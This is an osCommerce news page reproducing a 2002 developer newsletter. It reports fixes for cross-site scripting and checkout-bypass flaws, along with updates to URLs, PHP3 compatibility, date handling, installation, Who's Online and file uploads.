osCommerce News
Recent posts
post item
Managing FedEx Shipping
March 28, 2024
Managing FedEx Shipping ...
post item
Managing DHL Shipping
March 27, 2024
Managing DHL Shipping ...
post item
Managing Search Plus
March 26, 2024
Managing Search Plus ...
post item
Managing Universal Log Report
March 25, 2024
Managing Universal Log Report ...
post item
Managing Temporary Stock Report
March 21, 2024
Managing Temporary Stock Report ...
post item
Updating Opayo Server Module
March 20, 2024
Updating Opayo Server Module ...
post item
Updating Opayo Pi Module
March 19, 2024
Updating Opayo Pi Module ...
post item
Managing Summary Report
March 19, 2024
Managing Summary Report ...
post item
Managing Stock by Manufacturer Report
March 18, 2024
Managing Stock by Manufacturer Report ...
post item
Managing Purchase Report
March 15, 2024
Managing Purchase Report ...
Products
Tags

Management

Ecommerce

Integrations

newsite

launch

grant

fund

replatforming

osCommerce 4.x

shopping cart

hosting

Installation

New PayPal Module (Latest API 2.0)

osCommerce 2.2

osCommerce 2.3

Shopping cart customizations

Manually

PayPal Express

APM (Alternative Payment Method)

Standard Variant

Advanced Variant

Configuration

Testing

Front End

Install osCommerce for Me

Let me install myself

Multiple sales channels

Single active sales channel

Installation on your own server

Assigning theme to sales channel

Deleting sales channel

Connect

App Shop

Adding Free Module

Admin Area

Adding Paid Module

Installing Module

Opayo Pi Module

Development Mode

Email Verification Before Registration

Managing Languages

Managing phpMussel

Managing Orders

oscommerce.com account

Creating Manual Orders

Managing Customers

Managing Customer Groups

Managing Brands

Managing Categories

Managing Filters on Categories

Managing Products

Managing Stock

Assigning Products and Categories to Front Ends

Assigning and Moving Products to Categories

Managing Default Sort Order on Product Listing and Category

Managing Cross-Sell and UPSell

Managing Reviews

Managing Attributes

Managing Product Groups

Managing Properties

Managing Suppliers

Managing Warehouses

Managing Sales Statistics and Purchase Report

Managing Stocktaking Costs

Managing Deleted Orders

Managing Coupons

Managing Virtual Gift Cards

Managing Sales Price

Managing Giveaways

Managing Featured Products

Managing SEO

Managing Meta Tags

Managing XML Sitemap

Settings of E-commerce Tracking for Google Tag Manager

Setting up GA4

Managing Pages

Managing Menus

Assigning Theme to Sales Channels

Deleting Sales Channels

Managing Translations

Managing Email Templates

Managing Catalog Pages

Managing Shipping Modules

Managing Payment Modules

Managing Order Structure

Managing Socials

Managing Extensions

Managing Managers

Managing Access Levels

Managing Back End Menu

Managing Configuration

Mail Sending via SMTP

Setting up SMTP

Status Groups

Order Statuses

Comment Templates

Stock Indication

Notify Me when in Stock

Stock Delivery Terms

Cross Sell Type

Cache Control

Filters

Managing Countries

Managing Counties and States

Geo Zones

Managing Cities

city settings

Postal Codes

Managing Taxes

Managing Currencies

Backups

Viewing Who is Online

Managing IP Restriction

Error Log Viewer

Creating Installation

Address Formats

Image Settings

Sales Tags

Managing Front Ends

Managing App Shop

Going Live with osCommerce

Affiliate Module

Awin Module

B2B Module

Business To Business module

Bazaarvoice Module

Managing Blog

Collection Points

Managing Competitors

Customer Code Module

Customer Modules Module

Customer Multi Emails Module

Customer Products Module

Delayed Despatch Module

Delivery Options Module

Fraud Address Module

Frontend Session Module

Invoice Number Format Module

Maximum Order Quantity

Merge Customers Module

Merge Orders Module

Minimum Order Quantity

Neighbour Module

One Trust Module

Order Flags and Markers

Pack Units

Covered by Coupon Module

Klarna Module

LiqPay Module

Mollie Pay

Pay360 by Capita Module

pxPay Module

RBS WorldPay Module

Tyl by NatWest Module

Personal Catalog

Personal Discount Module

Product Bundles

Product Collections

Product Easy View

Product Global Sort

Product Ignored Payment Methods

Product Ignored Shipping Methods

Product Press Reviews

Product Relocation

Managing Refer Friend

Bookkeeping Detail Report

Changes History Report

Compare Report

Deficit Product Report

Emails History Report

Report by Email Module

Expected Products Report

Managing Freeze Stock

In Cart Stock Report

Low Stock Report

Manufacturer Sales Report

Ordered Products Report

Purchase Report

Stock by Manufacturer Report

Summary Report

Updating Opayo Pi Module

Updating Opayo Server Module

Temporary Stock Report

Universal Log Report

Managing Search Plus

Managing DHL Shipping

Managing FedEx Shipping

Issue #10: August 19, 2002

By Harald Ponce de Leon

August 19, 2002

Cross Site Scripting Vulnerabilities
Checkout And Order Security Issues
Search Engine Safe Urls
PHP3 Compatibility
Windows Date Problem Readdressed
Installation Module Updates For PHP-CGI Servers
Whos Online Logic Update
File Upload Standards

Cross Site Scripting Vulnerabilities

Tamura Toshihiko informed the developers forum of cross site scripting vulnerabilities existing in the 2.2-CVS codebase.

The posting can be read at:

https://www.oscommerce.com/community.php/forum,2/action,read/i,16332/t,16332

Fixes to the problem areas have been commited, but we are still working on a complete solution by validating user input.

Mattice has submitted a global fix which can be used on live stores, which can be read at:

https://www.oscommerce.com/community.php/forum,2/action,read/i,16432/t,16432

Checkout And Order Security Issues

Geoff Ford forwarded issues concerning the checkout procedure and how orders are made. It is possible for a customer to bypass the checkout procedure and head straight to the processing logic creating false orders.

This issue is most serious to those offering downloadable products that may be active to the customer as soon as an order has been falsely made.

A fix to the problem has been commited which can be seen here:

https://marc.theaimsgroup.com/?l=tep-commits&m=102975528416119&w=2

Search Engine Safe Urls

The logic to the Search Engine Safe Urls feature has been updated to properly parse all GET parameters, including the session ID where necessary.

This update may cause robots to cycle in a live store - we are currently discussing possible solutions to overcome this issue.

One nice solution mentioned is to start the session only when it is needed, for example when adding a product to the cart, and when a customer logs in or creates an account.

PHP3 Compatibility

Updates to the code logic have been made to bring back PHP3 compatibility. The estimated minimum for PHP3 versions is 3.0.7 - tests on bringing back the PHP3 compatibility were done on 3.0.11, the earliest version found for Windows servers.

Windows Date Problem Readdressed

Michael Burke has forwarded an update to the logic used for parsing dates prior 1970 on Windows based servers.

Dates prior 1970 should now be displayed correctly.

Installation Module Updates For PHP-CGI Servers

The installation module has been updated to allow for easier installation with servers that have PHP setup as CGI.

If you encounter any problems with the provided default path parameters during the installation procedure, please forward relevant information to the developers forum.

Whos Online Logic Update

The logic to the whos online feature has been updated to use only the necessary session variables from the customer on the catalog side.

Previously if the customer was viewing the store in a foreign language, selecting their entry on the Whos Online feature would use that language variable on the Administration Tool itself.

The logic calculating the customers shopping cart total has also been updated to calculate the right tax amount if display_price_with_tax is enabled. The [sub]total price shown is the exact price shown to the customer in their shopping cart box.

File Upload Standards

A new standard has been defined to handle file upload processing - which is compatible with all PHP versions, taking advantage of the features available of the PHP version in use.

The API documentation for this standard will soon be added to the CVS repository.

 

You can further discuss it on our Forum